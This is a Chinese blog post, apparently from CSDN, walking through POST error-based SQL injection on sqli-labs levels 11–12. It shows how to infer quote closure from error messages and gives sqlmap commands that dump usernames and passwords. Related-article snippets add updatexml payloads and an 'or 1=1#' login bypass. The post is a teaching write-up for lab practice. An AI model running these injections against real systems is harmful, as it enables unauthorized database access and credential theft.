sql POST基于错误的注入

最新推荐文章于 2024-08-28 20:01:44 发布
最新推荐文章于 2024-08-28 20:01:44 发布
阅读量609 收藏 2
点赞数
分类专栏: web python开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/87876013
版权

这里面 需要用到的工具是   Burp Suite  这款 优秀的抓包工具   然后还有sqlmap 等等  

抓包的教程  有很多 这里就不一一叙述了 

我们先来看一下 11这个关卡 

 然后 这里  可以直接输入 看返回结果 比如 

也可以 截取 数据包  然后用  

 

来发送    其中呢   我们可以 通过报错信息来猜测闭合的信息   

比如 我们输入了 是 admid\    报错是    123456'  limit 0,1  那么  

我们可以 推测  这个的信息  是 

select  name,password from admin  where name='xxxx'  and password ='xxxx'

其中 我们的 \   把 xxxx 后面的  '给转译成 正常的字符  那么  是由  password 第一个'来闭合的  那么 后面的 123456’自然的就报错了  那么 这里我们就有很多要写的东西了

我们直接 这样 

构造了一个闭合   就直接 可以显示出来了   正确的

然后我们看 12 

  

 这里的报错是   “123456\”  那么 

我们可以 构造闭合 

登陆成功@!!!

然后就是 就   用sqlmap 跑程序 

首先把数据包复制下来

然后 用sqlmap 跑一下

 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E --current-db --batch

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -D security --tables --batch 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users --columns --batch

 py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users -C'username,password' --dump  --batch

 

pipixia233333
关注
专栏目录
SQL报错注入
qq_64332865的博客
02-18 606
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
基于报错的sql注入
qq_44111753的博客
11-21 304
MYSQL中默认有个information schema数据库,用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata:schema_ name字段用来存储数据库名。 tables:table_ schema和table_ name分别用来存储数据库名和表名。 columns:table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM
sqlserver的几个函数【get,post请求】,【触发器】
九天虚空的博客
07-29 242
【代码】sqlserver的几个函数【get,post请求】,【触发器】
SQL注入 1-3_基于post报错注入
weixin_44110913的博客
12-03 551
** SQL注入 1-3_基于post报错注入 ** 一.概念 客户端提交参数基于post 1.基于post注入不会拼接到url 2.相对get提交参数更加安全 3.但是依然可以使用代理(中间人)截断判断是否存在sql注入 二.基于post报错的实列 1.打开登陆页面 按照常规的符号手段,观察以下三张图,并没有报错 当然也可以使用 id=1 and 1=2 和 id=1’ and ‘1’ =...
基于报错的注入模式
WYJ____的博客
07-26 602
updatexml函数   基于报错的注入一般bu'z步骤 1.求闭合字符;2.爆数据库名;3.爆表名;4.爆列名;5.爆字段名。     求库名 ?id=1’ and updatexml(1,concat(0x23,database()),1)%23 求表名 ?id=1' and updatexml(1,concat(0x23,(select group_concat(ta...
sql注入——post,head,报错注入
qq_33441500的博客
10-15 320
sql注入——post,head,报错注入 一,POST注入 post注入高危点: 登录框 查询框 各类与数据库有交互框 经典的万能密码 'or 1=1# post注入跟get注入都差不多 那我们先判断先字段数 输入’order by 3# 联合查询 查询数据库名 post注入检测方式还有两种 1,使用sqlmap -u url --...
第八节 Mysql POST基于错误注入-01
09-15
Mysql POST基于错误注入 本节课程主要讲解了Mysql POST基于错误注入的攻击技术,包括使用Burpsuite抓取HTTP请求、POST基于错误单引号注入和双引号注入Sqlmap安全测试等。 在Web应用安全测试中,Burpsuite是一款...
基于POSTSQL注入(一)
野原新之助
01-16 858
sql-lib中进行 1、打开bp抓包 2、发送至 repeater 中进行注入,在用户名处添加反斜扛测试内部SQL语句 3、分析: 根据报错,当输入用户名为 111\ 时,错误提示在密码为 222' 的错误,初步断定这是因为用户名处的 \ 与其闭合单引号被转译为普通字符,因此无法进行闭合,导致密码的起始单引号被作为用户名的闭合符号,造成密码处的单引号无从闭合。 因此初步断定,SQL语句为...
基于Web的SQL注入漏洞研究 (1).pdf
01-04
"基于Web的SQL注入漏洞研究" 在这个资源中,我们将探讨基于Web的SQL注入漏洞,包括其概念、分类、检测方法和防护措施。 SQL 注入是一种常见的Web应用安全漏洞,它发生在攻击者在用户输入参数中插入恶意的SQL代码,...
sql注入知识点总结.pdf
02-11
按照注入手法来分,主要类型有联合查询注入(UNION SQL injection)、基于错误SQL注入(Error-based SQL injection)、基于布尔的盲注(Boolean-based blind SQL injection)、基于时间延迟的盲注(Time-based ...
25-4 SQL注入攻击 - update注入
weixin_43263566的博客
03-09 798
使用mysql函数:代码中使用了过时的mysql函数来执行SQL查询,而不是使用更安全的mysqli或PDO。mysql函数对于SQL注入攻击是脆弱的,因为它没有提供预处理语句的功能。黑名单过滤只能防止已知的攻击字符串,而无法应对所有可能的变种和绕过方法。替换为适合您情况的实际条件,以确保只有符合条件的行会被更新。获取用户输入的ID值,但没有对其进行充分的验证和过滤,直接将其用于SQL查询。自定义的黑名单过滤机制:代码中使用了自定义的黑名单函数。用户输入未经过充分验证和过滤:在代码中,通过。
MySQL|POST基于错误注入
m_de_g的博客
11-30 1572
sql-labs()漏洞分析
1-7 POST基于错误注入
LoveStarbucks的博客
12-29 372
1-7 POST基于错误注入 1.Burpsuite抓取HTTP请求 (1)截断代理设置:在浏览器中设置局域网中代理。 安装该插件,或者可以直接设置代理 127.0.0.1 8080 (2)启动Burpsuite截取信息 首先看Burpsuite是否处于Run状态,如果不处于,则可能是端口冲突,需要修改端口,同时在浏览器中设置的代理也需要修改端口。 1)开启截断 2).捕获到截取的信息 ...
sql注入--基于报错的注入
weixin_30568591的博客
04-16 119
这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学院的教程)基于报错的注入,如图,在数据库上测试,产生报错 http://localhost/sqlilabs/Less-5/index.php?id=3' and (select...
基于报错型的注入
weixin_30386713的博客
07-19 182
一、floor() 、rand()、和 group by 组合: select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x 通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(...
SQL注入-基于报错的注入
xdjxi的博客
02-18 581
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错的SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错的注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
Error-based基于报错注入
最新发布
weixin_73049307的博客
08-28 840
id=1") and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) -- a中的标记数字就可以了。说明是双引号闭合字符型回显,而且显示出数据库的报错信息,适合使用报错注入。爆出emails,referers,uagents,users表名。爆出emails,referers,uagents,users表。爆出id,username,password列。
SQL注入之基于报错的注入
weixin_68951704的博客
07-05 1039
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
POST显错注入
m0_69676459的博客
05-06 132
单引号类型: 这时我们要选择方便的控件进行绕过: 非常简单! 双引号型: 本次的POST注入与上次的GET注入有何不同呢: 主要为:GET传参在URL里进行,POST传参在页面中进行。 GET传参注入的时候要注意URL编码,POST传参注入不用考虑URL编码的变化,但POST传参要考虑在页面的哪个控件注入。 实验中我们常用到的URL编码有%20(空格),%27(单引号),%29(空格)。 URL编码:URL编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中
SQL注入攻防策略:定位与检测方法
- **基于报错信息判断**:观察错误消息,如Oracle的`ORA-01756`或SQL Server的`MicrosoftOLEDBProviderforSQLServer错误80040e14`。 - **基于特有函数/语句判断**:某些数据库特有的功能或语法,如Oracle的`Ora`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值